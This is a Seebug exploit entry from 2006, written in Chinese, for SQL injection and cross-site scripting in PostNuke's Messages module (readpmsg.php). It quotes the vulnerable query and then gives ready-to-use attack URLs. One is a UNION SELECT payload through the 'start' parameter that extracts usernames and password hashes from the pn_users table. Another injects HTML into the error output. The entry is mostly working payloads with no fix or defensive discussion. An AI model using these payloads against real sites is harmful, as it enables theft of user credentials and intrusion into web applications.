PostNukeSQL注入和跨站脚本漏洞(CSS/XSS) Exploit

2006-12-05T00:00:00
ID SSV:5672
Type seebug
Reporter Root
Modified 2006-12-05T00:00:00

Description

No description provided by source.

                                        
                                            
                                                /modules/Messages/readpmsg.php

=======================
$sql = "SELECT $column[msg_id] AS \"msg_id\",
                    $column[msg_image] AS \"msg_image\",
                    $column[subject] AS \"subject\",
                    $column[from_userid] AS \"from_userid\",
                    $column[to_userid] AS \"to_userid\",
                    $column[msg_time] AS \"msg_time\",
                    $column[msg_text] AS \"msg_text\",
                    $column[read_msg] AS \"read_msg\"
            FROM $pntable[priv_msgs]
            WHERE $column[to_userid]='" . (int)pnVarPrepForStore($userdata) . "'";

    $resultID =& $dbconn->SelectLimit($sql,1,$start);
    if($dbconn->ErrorNo()<>0) {
        error_log("DB Error: " . $dbconn->ErrorMsg());
        echo $dbconn->ErrorMsg() . "<br />";
        forumerror(0005);
    }
=======================

首先登陆到postnuke,然后向自己发送消息,之后:
http://[target]/[postnuke_dir]/modules.php?op=modload&name=Messages&file=readpmsg&start=0[SQL inj]&total_messages=1

注意:
------
total_messages=1 - total_messages的ID必须存在。

之后就可以看到以下错误消息: 

error message :
---------------
========================
You have an error in your SQL syntax; check the manual that corresponds to your MySQL \
server version for the right syntax to use near '[SQL injection],1' at line 10 \
========================

SQL注入攻击:
=======================

http://[target]/[postnuke_dir]/modules.php?op=modload&name=Messages&file=readpmsg&start=0%20UNION%20SELECT%20pn_uname,null,pn_uname,pn_pass,pn_pass,null,pn_pass,null%20FROM%20pn_users%20WHERE%20pn_uid=2/*&total_messages=1

跨站脚本攻击:
============================

http://[target]/[postnuke_dir]/modules.php?op=modload&name=Messages&file=readpmsg&start=0'<h1>cXIb8O3 and sp3x - SecurityReason</h1>&total_messages=1

然后就可以得到:

error message :
---------------
========================
You have an error in your SQL syntax; check the manual that corresponds to your MySQL \
server version for the right syntax to use near ''[Our XSS],1' at line 10 \
========================